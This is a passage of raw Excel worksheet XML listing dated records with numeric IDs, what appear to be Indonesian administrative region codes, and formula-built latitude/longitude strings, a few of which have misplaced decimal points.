    <row r="3979" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3979">
        <v>298788</v>
      </c>
      <c r="B3979" s="1">
        <v>44497</v>
      </c>
      <c r="C3979" t="s">
        <v>13337</v>
      </c>
      <c r="D3979" t="s">
        <v>22</v>
      </c>
      <c r="E3979" t="s">
        <v>23</v>
      </c>
      <c r="F3979" t="s">
        <v>13338</v>
      </c>
      <c r="H3979" t="s">
        <v>26</v>
      </c>
      <c r="I3979" t="s">
        <v>137</v>
      </c>
      <c r="J3979" t="s">
        <v>5796</v>
      </c>
      <c r="L3979" t="s">
        <v>13339</v>
      </c>
      <c r="M3979">
        <v>3172100001</v>
      </c>
      <c r="N3979">
        <v>3172100</v>
      </c>
      <c r="O3979">
        <v>3172</v>
      </c>
      <c r="P3979">
        <v>31</v>
      </c>
      <c r="Q3979" t="s">
        <v>3253</v>
      </c>
      <c r="R3979" t="s">
        <v>1436</v>
      </c>
      <c r="S3979" t="s">
        <v>49</v>
      </c>
      <c r="T3979" t="s">
        <v>33</v>
      </c>
      <c r="U3979" s="5">
        <v>1068578155</v>
      </c>
      <c r="V3979" s="5" t="s">
        <v>18045</v>
      </c>
      <c r="W3979" s="5">
        <v>-62125160</v>
      </c>
      <c r="X3979" t="s">
        <v>21777</v>
      </c>
      <c r="Y3979" t="str">
        <f t="shared" si="62"/>
        <v>-6.2125160,106.8578155</v>
      </c>
    </row>
    <row r="3980" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3980">
        <v>298787</v>
      </c>
      <c r="B3980" s="1">
        <v>44497</v>
      </c>
      <c r="C3980" t="s">
        <v>13340</v>
      </c>
      <c r="D3980" t="s">
        <v>22</v>
      </c>
      <c r="E3980" t="s">
        <v>23</v>
      </c>
      <c r="F3980" t="s">
        <v>13341</v>
      </c>
      <c r="G3980" t="s">
        <v>13342</v>
      </c>
      <c r="H3980" t="s">
        <v>7978</v>
      </c>
      <c r="I3980" t="s">
        <v>7983</v>
      </c>
      <c r="J3980" t="s">
        <v>2608</v>
      </c>
      <c r="L3980" t="s">
        <v>13343</v>
      </c>
      <c r="M3980">
        <v>3310710010</v>
      </c>
      <c r="N3980">
        <v>3310710</v>
      </c>
      <c r="O3980">
        <v>3310</v>
      </c>
      <c r="P3980">
        <v>33</v>
      </c>
      <c r="Q3980" t="s">
        <v>13344</v>
      </c>
      <c r="R3980" t="s">
        <v>13345</v>
      </c>
      <c r="S3980" t="s">
        <v>6315</v>
      </c>
      <c r="T3980" t="s">
        <v>1134</v>
      </c>
      <c r="U3980" s="5">
        <v>1105799243</v>
      </c>
      <c r="V3980" s="5" t="s">
        <v>18046</v>
      </c>
      <c r="W3980" s="5">
        <v>-76949881</v>
      </c>
      <c r="X3980" t="s">
        <v>21778</v>
      </c>
      <c r="Y3980" t="str">
        <f t="shared" si="62"/>
        <v>-7.6949881,110.5799243</v>
      </c>
    </row>
    <row r="3981" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3981">
        <v>298784</v>
      </c>
      <c r="B3981" s="1">
        <v>44497</v>
      </c>
      <c r="C3981" t="s">
        <v>13346</v>
      </c>
      <c r="D3981" t="s">
        <v>22</v>
      </c>
      <c r="E3981" t="s">
        <v>23</v>
      </c>
      <c r="F3981" t="s">
        <v>13347</v>
      </c>
      <c r="H3981" t="s">
        <v>8525</v>
      </c>
      <c r="I3981" t="s">
        <v>13348</v>
      </c>
      <c r="J3981" t="s">
        <v>8176</v>
      </c>
      <c r="L3981" t="s">
        <v>13349</v>
      </c>
      <c r="M3981">
        <v>7107040007</v>
      </c>
      <c r="N3981">
        <v>7107040</v>
      </c>
      <c r="O3981">
        <v>7107</v>
      </c>
      <c r="P3981">
        <v>71</v>
      </c>
      <c r="Q3981" t="s">
        <v>13350</v>
      </c>
      <c r="R3981" t="s">
        <v>13351</v>
      </c>
      <c r="S3981" t="s">
        <v>13352</v>
      </c>
      <c r="T3981" t="s">
        <v>8181</v>
      </c>
      <c r="U3981" s="5">
        <v>1233359957</v>
      </c>
      <c r="V3981" s="5" t="s">
        <v>18047</v>
      </c>
      <c r="W3981" s="5">
        <v>9020433</v>
      </c>
      <c r="X3981" t="s">
        <v>21779</v>
      </c>
      <c r="Y3981" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.9020433,123.3359957</v>
      </c>
    </row>
    <row r="3982" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3982">
        <v>298781</v>
      </c>
      <c r="B3982" s="1">
        <v>44497</v>
      </c>
      <c r="C3982" t="s">
        <v>13353</v>
      </c>
      <c r="D3982" t="s">
        <v>22</v>
      </c>
      <c r="E3982" t="s">
        <v>23</v>
      </c>
      <c r="F3982" t="s">
        <v>13354</v>
      </c>
      <c r="G3982" t="s">
        <v>13355</v>
      </c>
      <c r="H3982" t="s">
        <v>7086</v>
      </c>
      <c r="I3982" t="s">
        <v>7421</v>
      </c>
      <c r="J3982" t="s">
        <v>8176</v>
      </c>
      <c r="L3982" t="s">
        <v>13356</v>
      </c>
      <c r="M3982">
        <v>7107050004</v>
      </c>
      <c r="N3982">
        <v>7107050</v>
      </c>
      <c r="O3982">
        <v>7107</v>
      </c>
      <c r="P3982">
        <v>71</v>
      </c>
      <c r="Q3982" t="s">
        <v>13357</v>
      </c>
      <c r="R3982" t="s">
        <v>13358</v>
      </c>
      <c r="S3982" t="s">
        <v>13352</v>
      </c>
      <c r="T3982" t="s">
        <v>8181</v>
      </c>
      <c r="U3982" s="5">
        <v>1232578951</v>
      </c>
      <c r="V3982" s="5" t="s">
        <v>18048</v>
      </c>
      <c r="W3982" s="5">
        <v>9079756</v>
      </c>
      <c r="X3982" t="s">
        <v>21780</v>
      </c>
      <c r="Y3982" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.9079756,123.2578951</v>
      </c>
    </row>
    <row r="3983" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3983">
        <v>298779</v>
      </c>
      <c r="B3983" s="1">
        <v>44497</v>
      </c>
      <c r="C3983" t="s">
        <v>13359</v>
      </c>
      <c r="D3983" t="s">
        <v>22</v>
      </c>
      <c r="E3983" t="s">
        <v>23</v>
      </c>
      <c r="F3983" t="s">
        <v>13360</v>
      </c>
      <c r="G3983" t="s">
        <v>13361</v>
      </c>
      <c r="H3983" t="s">
        <v>7978</v>
      </c>
      <c r="I3983" t="s">
        <v>7983</v>
      </c>
      <c r="J3983" t="s">
        <v>2627</v>
      </c>
      <c r="L3983" t="s">
        <v>13362</v>
      </c>
      <c r="M3983">
        <v>3203120007</v>
      </c>
      <c r="N3983">
        <v>3203120</v>
      </c>
      <c r="O3983">
        <v>3203</v>
      </c>
      <c r="P3983">
        <v>32</v>
      </c>
      <c r="Q3983" t="s">
        <v>13363</v>
      </c>
      <c r="R3983" t="s">
        <v>8421</v>
      </c>
      <c r="S3983" t="s">
        <v>8512</v>
      </c>
      <c r="T3983" t="s">
        <v>42</v>
      </c>
      <c r="U3983" s="5">
        <v>1071479530</v>
      </c>
      <c r="V3983" s="5" t="s">
        <v>18049</v>
      </c>
      <c r="W3983" s="5">
        <v>-69668282</v>
      </c>
      <c r="X3983" t="s">
        <v>21781</v>
      </c>
      <c r="Y3983" t="str">
        <f t="shared" si="62"/>
        <v>-6.9668282,107.1479530</v>
      </c>
    </row>
    <row r="3984" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3984">
        <v>298785</v>
      </c>
      <c r="B3984" s="1">
        <v>44497</v>
      </c>
      <c r="C3984" t="s">
        <v>13364</v>
      </c>
      <c r="D3984" t="s">
        <v>85</v>
      </c>
      <c r="E3984" t="s">
        <v>23</v>
      </c>
      <c r="F3984" t="s">
        <v>13365</v>
      </c>
      <c r="G3984" t="s">
        <v>13366</v>
      </c>
      <c r="H3984" t="s">
        <v>26</v>
      </c>
      <c r="J3984" t="s">
        <v>13367</v>
      </c>
      <c r="K3984" t="s">
        <v>13368</v>
      </c>
      <c r="L3984" t="s">
        <v>13369</v>
      </c>
      <c r="M3984">
        <v>3172030007</v>
      </c>
      <c r="N3984">
        <v>3172030</v>
      </c>
      <c r="O3984">
        <v>3172</v>
      </c>
      <c r="P3984">
        <v>31</v>
      </c>
      <c r="Q3984" t="s">
        <v>13370</v>
      </c>
      <c r="R3984" t="s">
        <v>228</v>
      </c>
      <c r="S3984" t="s">
        <v>49</v>
      </c>
      <c r="T3984" t="s">
        <v>33</v>
      </c>
      <c r="U3984" s="5">
        <v>1068944694</v>
      </c>
      <c r="V3984" s="5" t="s">
        <v>18050</v>
      </c>
      <c r="W3984" s="5">
        <v>-63075758</v>
      </c>
      <c r="X3984" t="s">
        <v>21782</v>
      </c>
      <c r="Y3984" t="str">
        <f t="shared" si="62"/>
        <v>-6.3075758,106.8944694</v>
      </c>
    </row>
    <row r="3985" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3985">
        <v>298800</v>
      </c>
      <c r="B3985" s="1">
        <v>44498</v>
      </c>
      <c r="C3985" t="s">
        <v>13371</v>
      </c>
      <c r="D3985" t="s">
        <v>22</v>
      </c>
      <c r="E3985" t="s">
        <v>23</v>
      </c>
      <c r="F3985" t="s">
        <v>13372</v>
      </c>
      <c r="G3985" t="s">
        <v>13373</v>
      </c>
      <c r="H3985" t="s">
        <v>26</v>
      </c>
      <c r="I3985" t="s">
        <v>27</v>
      </c>
      <c r="J3985" t="s">
        <v>2627</v>
      </c>
      <c r="L3985" t="s">
        <v>13374</v>
      </c>
      <c r="M3985">
        <v>3203150009</v>
      </c>
      <c r="N3985">
        <v>3203150</v>
      </c>
      <c r="O3985">
        <v>3203</v>
      </c>
      <c r="P3985">
        <v>32</v>
      </c>
      <c r="Q3985" t="s">
        <v>13375</v>
      </c>
      <c r="R3985" t="s">
        <v>11419</v>
      </c>
      <c r="S3985" t="s">
        <v>8512</v>
      </c>
      <c r="T3985" t="s">
        <v>42</v>
      </c>
      <c r="U3985" s="5">
        <v>1072237794</v>
      </c>
      <c r="V3985" s="5" t="s">
        <v>18051</v>
      </c>
      <c r="W3985" s="5">
        <v>-68031540</v>
      </c>
      <c r="X3985" t="s">
        <v>21783</v>
      </c>
      <c r="Y3985" t="str">
        <f t="shared" si="62"/>
        <v>-6.8031540,107.2237794</v>
      </c>
    </row>
    <row r="3986" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3986">
        <v>298802</v>
      </c>
      <c r="B3986" s="1">
        <v>44498</v>
      </c>
      <c r="C3986" t="s">
        <v>13376</v>
      </c>
      <c r="D3986" t="s">
        <v>22</v>
      </c>
      <c r="E3986" t="s">
        <v>23</v>
      </c>
      <c r="F3986" t="s">
        <v>13377</v>
      </c>
      <c r="G3986" t="s">
        <v>13378</v>
      </c>
      <c r="H3986" t="s">
        <v>26</v>
      </c>
      <c r="I3986" t="s">
        <v>137</v>
      </c>
      <c r="J3986" t="s">
        <v>13379</v>
      </c>
      <c r="L3986" t="s">
        <v>13380</v>
      </c>
      <c r="M3986">
        <v>3374050005</v>
      </c>
      <c r="N3986">
        <v>3374050</v>
      </c>
      <c r="O3986">
        <v>3374</v>
      </c>
      <c r="P3986">
        <v>33</v>
      </c>
      <c r="Q3986" t="s">
        <v>13381</v>
      </c>
      <c r="R3986" t="s">
        <v>11866</v>
      </c>
      <c r="S3986" t="s">
        <v>1334</v>
      </c>
      <c r="T3986" t="s">
        <v>1134</v>
      </c>
      <c r="U3986" s="5">
        <v>1104229081</v>
      </c>
      <c r="V3986" s="5" t="s">
        <v>18052</v>
      </c>
      <c r="W3986" s="5">
        <v>-69904003</v>
      </c>
      <c r="X3986" t="s">
        <v>21784</v>
      </c>
      <c r="Y3986" t="str">
        <f t="shared" si="62"/>
        <v>-6.9904003,110.4229081</v>
      </c>
    </row>
    <row r="3987" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3987">
        <v>298790</v>
      </c>
      <c r="B3987" s="1">
        <v>44498</v>
      </c>
      <c r="C3987" t="s">
        <v>13382</v>
      </c>
      <c r="D3987" t="s">
        <v>22</v>
      </c>
      <c r="E3987" t="s">
        <v>23</v>
      </c>
      <c r="F3987" t="s">
        <v>13383</v>
      </c>
      <c r="G3987" t="s">
        <v>13384</v>
      </c>
      <c r="H3987" t="s">
        <v>26</v>
      </c>
      <c r="I3987" t="s">
        <v>1005</v>
      </c>
      <c r="J3987" t="s">
        <v>2608</v>
      </c>
      <c r="L3987" t="s">
        <v>13385</v>
      </c>
      <c r="M3987">
        <v>3375040006</v>
      </c>
      <c r="N3987">
        <v>3375040</v>
      </c>
      <c r="O3987">
        <v>3375</v>
      </c>
      <c r="P3987">
        <v>33</v>
      </c>
      <c r="Q3987" t="s">
        <v>7385</v>
      </c>
      <c r="R3987" t="s">
        <v>7339</v>
      </c>
      <c r="S3987" t="s">
        <v>6246</v>
      </c>
      <c r="T3987" t="s">
        <v>1134</v>
      </c>
      <c r="U3987" s="5">
        <v>1096886319</v>
      </c>
      <c r="V3987" s="5" t="s">
        <v>18053</v>
      </c>
      <c r="W3987" s="5">
        <v>-68593290</v>
      </c>
      <c r="X3987" t="s">
        <v>21785</v>
      </c>
      <c r="Y3987" t="str">
        <f t="shared" si="62"/>
        <v>-6.8593290,109.6886319</v>
      </c>
    </row>
    <row r="3988" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3988">
        <v>298803</v>
      </c>
      <c r="B3988" s="1">
        <v>44498</v>
      </c>
      <c r="C3988" t="s">
        <v>13386</v>
      </c>
      <c r="D3988" t="s">
        <v>22</v>
      </c>
      <c r="E3988" t="s">
        <v>23</v>
      </c>
      <c r="F3988" t="s">
        <v>13387</v>
      </c>
      <c r="G3988" t="s">
        <v>13388</v>
      </c>
      <c r="H3988" t="s">
        <v>8525</v>
      </c>
      <c r="I3988" t="s">
        <v>13389</v>
      </c>
      <c r="J3988" t="s">
        <v>8176</v>
      </c>
      <c r="L3988" t="s">
        <v>13390</v>
      </c>
      <c r="M3988">
        <v>7107010003</v>
      </c>
      <c r="N3988">
        <v>7107010</v>
      </c>
      <c r="O3988">
        <v>7107</v>
      </c>
      <c r="P3988">
        <v>71</v>
      </c>
      <c r="Q3988" t="s">
        <v>13391</v>
      </c>
      <c r="R3988" t="s">
        <v>13392</v>
      </c>
      <c r="S3988" t="s">
        <v>13352</v>
      </c>
      <c r="T3988" t="s">
        <v>8181</v>
      </c>
      <c r="U3988" s="5">
        <v>1236494493</v>
      </c>
      <c r="V3988" s="5" t="s">
        <v>18054</v>
      </c>
      <c r="W3988" s="5">
        <v>8825084</v>
      </c>
      <c r="X3988" t="s">
        <v>21786</v>
      </c>
      <c r="Y3988" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.8825084,123.6494493</v>
      </c>
    </row>
    <row r="3989" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3989">
        <v>298797</v>
      </c>
      <c r="B3989" s="1">
        <v>44498</v>
      </c>
      <c r="C3989" t="s">
        <v>13393</v>
      </c>
      <c r="D3989" t="s">
        <v>22</v>
      </c>
      <c r="E3989" t="s">
        <v>23</v>
      </c>
      <c r="F3989" t="s">
        <v>13394</v>
      </c>
      <c r="G3989" t="s">
        <v>13395</v>
      </c>
      <c r="H3989" t="s">
        <v>9262</v>
      </c>
      <c r="I3989" t="s">
        <v>13396</v>
      </c>
      <c r="J3989" t="s">
        <v>6038</v>
      </c>
      <c r="M3989">
        <v>1213030004</v>
      </c>
      <c r="N3989">
        <v>1213030</v>
      </c>
      <c r="O3989">
        <v>1213</v>
      </c>
      <c r="P3989">
        <v>12</v>
      </c>
      <c r="Q3989" t="s">
        <v>13397</v>
      </c>
      <c r="R3989" t="s">
        <v>13398</v>
      </c>
      <c r="S3989" t="s">
        <v>13399</v>
      </c>
      <c r="T3989" t="s">
        <v>6043</v>
      </c>
      <c r="U3989" s="5">
        <v>984425376</v>
      </c>
      <c r="V3989" s="5" t="s">
        <v>18055</v>
      </c>
      <c r="W3989" s="5">
        <v>32545300</v>
      </c>
      <c r="X3989" t="s">
        <v>21787</v>
      </c>
      <c r="Y3989" t="str">
        <f t="shared" si="62"/>
        <v>3.2545300,984.425376</v>
      </c>
    </row>
    <row r="3990" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3990">
        <v>298801</v>
      </c>
      <c r="B3990" s="1">
        <v>44498</v>
      </c>
      <c r="C3990" t="s">
        <v>13400</v>
      </c>
      <c r="D3990" t="s">
        <v>22</v>
      </c>
      <c r="E3990" t="s">
        <v>23</v>
      </c>
      <c r="F3990" t="s">
        <v>13401</v>
      </c>
      <c r="G3990" t="s">
        <v>13402</v>
      </c>
      <c r="H3990" t="s">
        <v>26</v>
      </c>
      <c r="I3990" t="s">
        <v>137</v>
      </c>
      <c r="J3990" t="s">
        <v>1656</v>
      </c>
      <c r="M3990">
        <v>3173080003</v>
      </c>
      <c r="N3990">
        <v>3173080</v>
      </c>
      <c r="O3990">
        <v>3173</v>
      </c>
      <c r="P3990">
        <v>31</v>
      </c>
      <c r="Q3990" t="s">
        <v>157</v>
      </c>
      <c r="R3990" t="s">
        <v>157</v>
      </c>
      <c r="S3990" t="s">
        <v>62</v>
      </c>
      <c r="T3990" t="s">
        <v>33</v>
      </c>
      <c r="U3990" s="5">
        <v>1068271494</v>
      </c>
      <c r="V3990" s="5" t="s">
        <v>18024</v>
      </c>
      <c r="W3990" s="5">
        <v>-61753930</v>
      </c>
      <c r="X3990" t="s">
        <v>21756</v>
      </c>
      <c r="Y3990" t="str">
        <f t="shared" si="62"/>
        <v>-6.1753930,106.8271494</v>
      </c>
    </row>
    <row r="3991" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3991">
        <v>298813</v>
      </c>
      <c r="B3991" s="1">
        <v>44499</v>
      </c>
      <c r="C3991" t="s">
        <v>13403</v>
      </c>
      <c r="D3991" t="s">
        <v>22</v>
      </c>
      <c r="E3991" t="s">
        <v>23</v>
      </c>
      <c r="F3991" t="s">
        <v>13404</v>
      </c>
      <c r="H3991" t="s">
        <v>26</v>
      </c>
      <c r="I3991" t="s">
        <v>4228</v>
      </c>
      <c r="J3991" t="s">
        <v>2627</v>
      </c>
      <c r="L3991" t="s">
        <v>13405</v>
      </c>
      <c r="M3991">
        <v>3201190010</v>
      </c>
      <c r="N3991">
        <v>3201190</v>
      </c>
      <c r="O3991">
        <v>3201</v>
      </c>
      <c r="P3991">
        <v>32</v>
      </c>
      <c r="Q3991" t="s">
        <v>419</v>
      </c>
      <c r="R3991" t="s">
        <v>420</v>
      </c>
      <c r="S3991" t="s">
        <v>421</v>
      </c>
      <c r="T3991" t="s">
        <v>42</v>
      </c>
      <c r="U3991" s="5">
        <v>1069694406</v>
      </c>
      <c r="V3991" s="5" t="s">
        <v>18056</v>
      </c>
      <c r="W3991" s="5">
        <v>-63066022</v>
      </c>
      <c r="X3991" t="s">
        <v>21788</v>
      </c>
      <c r="Y3991" t="str">
        <f t="shared" si="62"/>
        <v>-6.3066022,106.9694406</v>
      </c>
    </row>
    <row r="3992" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3992">
        <v>298825</v>
      </c>
      <c r="B3992" s="1">
        <v>44499</v>
      </c>
      <c r="C3992" t="s">
        <v>13406</v>
      </c>
      <c r="D3992" t="s">
        <v>22</v>
      </c>
      <c r="E3992" t="s">
        <v>23</v>
      </c>
      <c r="F3992" t="s">
        <v>13407</v>
      </c>
      <c r="G3992" t="s">
        <v>13408</v>
      </c>
      <c r="H3992" t="s">
        <v>26</v>
      </c>
      <c r="I3992" t="s">
        <v>961</v>
      </c>
      <c r="J3992" t="s">
        <v>7436</v>
      </c>
      <c r="M3992">
        <v>6107180005</v>
      </c>
      <c r="N3992">
        <v>6107180</v>
      </c>
      <c r="O3992">
        <v>6107</v>
      </c>
      <c r="P3992">
        <v>61</v>
      </c>
      <c r="Q3992" t="s">
        <v>13409</v>
      </c>
      <c r="R3992" t="s">
        <v>13410</v>
      </c>
      <c r="S3992" t="s">
        <v>13411</v>
      </c>
      <c r="T3992" t="s">
        <v>7441</v>
      </c>
      <c r="U3992" s="5">
        <v>1115598118</v>
      </c>
      <c r="V3992" s="5" t="s">
        <v>18057</v>
      </c>
      <c r="W3992" s="5">
        <v>1927001</v>
      </c>
      <c r="X3992" t="s">
        <v>21789</v>
      </c>
      <c r="Y3992" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.1927001,111.5598118</v>
      </c>
    </row>
    <row r="3993" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3993">
        <v>298891</v>
      </c>
      <c r="B3993" s="1">
        <v>44500</v>
      </c>
      <c r="C3993" t="s">
        <v>13412</v>
      </c>
      <c r="D3993" t="s">
        <v>22</v>
      </c>
      <c r="E3993" t="s">
        <v>23</v>
      </c>
      <c r="F3993" t="s">
        <v>13413</v>
      </c>
      <c r="G3993" t="s">
        <v>13414</v>
      </c>
      <c r="H3993" t="s">
        <v>7978</v>
      </c>
      <c r="I3993" t="s">
        <v>7979</v>
      </c>
      <c r="J3993" t="s">
        <v>2608</v>
      </c>
      <c r="L3993" t="s">
        <v>13415</v>
      </c>
      <c r="M3993">
        <v>3323080001</v>
      </c>
      <c r="N3993">
        <v>3323080</v>
      </c>
      <c r="O3993">
        <v>3323</v>
      </c>
      <c r="P3993">
        <v>33</v>
      </c>
      <c r="Q3993" t="s">
        <v>13416</v>
      </c>
      <c r="R3993" t="s">
        <v>6388</v>
      </c>
      <c r="S3993" t="s">
        <v>2612</v>
      </c>
      <c r="T3993" t="s">
        <v>1134</v>
      </c>
      <c r="U3993" s="5">
        <v>1101821664</v>
      </c>
      <c r="V3993" s="5" t="s">
        <v>18058</v>
      </c>
      <c r="W3993" s="5">
        <v>-72884382</v>
      </c>
      <c r="X3993" t="s">
        <v>21790</v>
      </c>
      <c r="Y3993" t="str">
        <f t="shared" si="62"/>
        <v>-7.2884382,110.1821664</v>
      </c>
    </row>
    <row r="3994" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3994">
        <v>298936</v>
      </c>
      <c r="B3994" s="1">
        <v>44505</v>
      </c>
      <c r="C3994" t="s">
        <v>13417</v>
      </c>
      <c r="D3994" t="s">
        <v>22</v>
      </c>
      <c r="E3994" t="s">
        <v>23</v>
      </c>
      <c r="F3994" t="s">
        <v>13418</v>
      </c>
      <c r="H3994" t="s">
        <v>26</v>
      </c>
      <c r="I3994" t="s">
        <v>137</v>
      </c>
      <c r="J3994" t="s">
        <v>6940</v>
      </c>
      <c r="L3994" t="s">
        <v>13419</v>
      </c>
      <c r="M3994">
        <v>1108070036</v>
      </c>
      <c r="N3994">
        <v>1108070</v>
      </c>
      <c r="O3994">
        <v>1108</v>
      </c>
      <c r="P3994">
        <v>11</v>
      </c>
      <c r="Q3994" t="s">
        <v>13420</v>
      </c>
      <c r="R3994" t="s">
        <v>13421</v>
      </c>
      <c r="S3994" t="s">
        <v>13422</v>
      </c>
      <c r="T3994" t="s">
        <v>6945</v>
      </c>
      <c r="U3994" s="5">
        <v>9539248466</v>
      </c>
      <c r="V3994" s="5" t="s">
        <v>18059</v>
      </c>
      <c r="W3994" s="5">
        <v>555311427</v>
      </c>
      <c r="X3994" t="s">
        <v>21791</v>
      </c>
      <c r="Y3994" t="str">
        <f t="shared" si="62"/>
        <v>5.55311427,953.9248466</v>
      </c>
    </row>
    <row r="3995" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3995">
        <v>298942</v>
      </c>
      <c r="B3995" s="1">
        <v>44506</v>
      </c>
      <c r="C3995" t="s">
        <v>13423</v>
      </c>
      <c r="D3995" t="s">
        <v>22</v>
      </c>
      <c r="E3995" t="s">
        <v>23</v>
      </c>
      <c r="F3995" t="s">
        <v>13424</v>
      </c>
      <c r="H3995" t="s">
        <v>26</v>
      </c>
      <c r="I3995" t="s">
        <v>386</v>
      </c>
      <c r="J3995" t="s">
        <v>6940</v>
      </c>
      <c r="L3995" t="s">
        <v>13425</v>
      </c>
      <c r="M3995">
        <v>1103030017</v>
      </c>
      <c r="N3995">
        <v>1103030</v>
      </c>
      <c r="O3995">
        <v>1103</v>
      </c>
      <c r="P3995">
        <v>11</v>
      </c>
      <c r="Q3995" t="s">
        <v>13426</v>
      </c>
      <c r="R3995" t="s">
        <v>7666</v>
      </c>
      <c r="S3995" t="s">
        <v>7667</v>
      </c>
      <c r="T3995" t="s">
        <v>6945</v>
      </c>
      <c r="U3995" s="5">
        <v>9734299240</v>
      </c>
      <c r="V3995" s="5" t="s">
        <v>18060</v>
      </c>
      <c r="W3995" s="5">
        <v>307328477</v>
      </c>
      <c r="X3995" t="s">
        <v>21792</v>
      </c>
      <c r="Y3995" t="str">
        <f t="shared" si="62"/>
        <v>3.07328477,973.4299240</v>
      </c>
    </row>
    <row r="3996" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3996">
        <v>299057</v>
      </c>
      <c r="B3996" s="1">
        <v>44524</v>
      </c>
      <c r="C3996" t="s">
        <v>13427</v>
      </c>
      <c r="D3996" t="s">
        <v>22</v>
      </c>
      <c r="E3996" t="s">
        <v>23</v>
      </c>
      <c r="F3996" t="s">
        <v>13428</v>
      </c>
      <c r="G3996" t="s">
        <v>13429</v>
      </c>
      <c r="H3996" t="s">
        <v>7978</v>
      </c>
      <c r="I3996" t="s">
        <v>7983</v>
      </c>
      <c r="J3996" t="s">
        <v>2627</v>
      </c>
      <c r="L3996" t="s">
        <v>13430</v>
      </c>
      <c r="M3996">
        <v>3273020006</v>
      </c>
      <c r="N3996">
        <v>3273020</v>
      </c>
      <c r="O3996">
        <v>3273</v>
      </c>
      <c r="P3996">
        <v>32</v>
      </c>
      <c r="Q3996" t="s">
        <v>7037</v>
      </c>
      <c r="R3996" t="s">
        <v>6738</v>
      </c>
      <c r="S3996" t="s">
        <v>1464</v>
      </c>
      <c r="T3996" t="s">
        <v>42</v>
      </c>
      <c r="U3996" s="5">
        <v>10758175135</v>
      </c>
      <c r="V3996" s="5" t="s">
        <v>18061</v>
      </c>
      <c r="W3996" s="5">
        <v>-692312517</v>
      </c>
      <c r="X3996" t="s">
        <v>21793</v>
      </c>
      <c r="Y3996" t="str">
        <f t="shared" si="62"/>
        <v>-6.92312517,107.58175135</v>
      </c>
    </row>
    <row r="3997" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3997">
        <v>299101</v>
      </c>
      <c r="B3997" s="1">
        <v>44526</v>
      </c>
      <c r="C3997" t="s">
        <v>13431</v>
      </c>
      <c r="D3997" t="s">
        <v>22</v>
      </c>
      <c r="E3997" t="s">
        <v>23</v>
      </c>
      <c r="F3997" s="3" t="s">
        <v>13432</v>
      </c>
      <c r="G3997" t="s">
        <v>13433</v>
      </c>
      <c r="H3997" t="s">
        <v>26</v>
      </c>
      <c r="I3997" t="s">
        <v>1538</v>
      </c>
      <c r="J3997" t="s">
        <v>2627</v>
      </c>
      <c r="L3997" t="s">
        <v>13434</v>
      </c>
      <c r="M3997">
        <v>3273130001</v>
      </c>
      <c r="N3997">
        <v>3273130</v>
      </c>
      <c r="O3997">
        <v>3273</v>
      </c>
      <c r="P3997">
        <v>32</v>
      </c>
      <c r="Q3997" t="s">
        <v>13435</v>
      </c>
      <c r="R3997" t="s">
        <v>6763</v>
      </c>
      <c r="S3997" t="s">
        <v>1464</v>
      </c>
      <c r="T3997" t="s">
        <v>42</v>
      </c>
      <c r="U3997" s="5">
        <v>10767699122</v>
      </c>
      <c r="V3997" s="5" t="s">
        <v>18062</v>
      </c>
      <c r="W3997" s="5">
        <v>-692857268</v>
      </c>
      <c r="X3997" t="s">
        <v>21794</v>
      </c>
      <c r="Y3997" t="str">
        <f t="shared" si="62"/>
        <v>-6.92857268,107.67699122</v>
      </c>
    </row>
    <row r="3998" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3998">
        <v>299091</v>
      </c>
      <c r="B3998" s="1">
        <v>44526</v>
      </c>
      <c r="C3998" t="s">
        <v>13436</v>
      </c>
      <c r="D3998" t="s">
        <v>22</v>
      </c>
      <c r="E3998" t="s">
        <v>23</v>
      </c>
      <c r="F3998" t="s">
        <v>13437</v>
      </c>
      <c r="G3998" t="s">
        <v>13438</v>
      </c>
      <c r="H3998" t="s">
        <v>26</v>
      </c>
      <c r="I3998" t="s">
        <v>65</v>
      </c>
      <c r="J3998" t="s">
        <v>2627</v>
      </c>
      <c r="L3998" t="s">
        <v>13439</v>
      </c>
      <c r="M3998">
        <v>3273080003</v>
      </c>
      <c r="N3998">
        <v>3273080</v>
      </c>
      <c r="O3998">
        <v>3273</v>
      </c>
      <c r="P3998">
        <v>32</v>
      </c>
      <c r="Q3998" t="s">
        <v>13440</v>
      </c>
      <c r="R3998" t="s">
        <v>13441</v>
      </c>
      <c r="S3998" t="s">
        <v>1464</v>
      </c>
      <c r="T3998" t="s">
        <v>42</v>
      </c>
      <c r="U3998" s="5">
        <v>10763882875</v>
      </c>
      <c r="V3998" s="5" t="s">
        <v>18063</v>
      </c>
      <c r="W3998" s="5">
        <v>-694846343</v>
      </c>
      <c r="X3998" t="s">
        <v>21795</v>
      </c>
      <c r="Y3998" t="str">
        <f t="shared" si="62"/>
        <v>-6.94846343,107.63882875</v>
      </c>
    </row>
    <row r="3999" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3999">
        <v>299092</v>
      </c>
      <c r="B3999" s="1">
        <v>44526</v>
      </c>
      <c r="C3999" t="s">
        <v>13442</v>
      </c>
      <c r="D3999" t="s">
        <v>22</v>
      </c>
      <c r="E3999" t="s">
        <v>23</v>
      </c>
      <c r="F3999" t="s">
        <v>13443</v>
      </c>
      <c r="G3999" t="s">
        <v>13444</v>
      </c>
      <c r="H3999" t="s">
        <v>26</v>
      </c>
      <c r="I3999" t="s">
        <v>1194</v>
      </c>
      <c r="J3999" t="s">
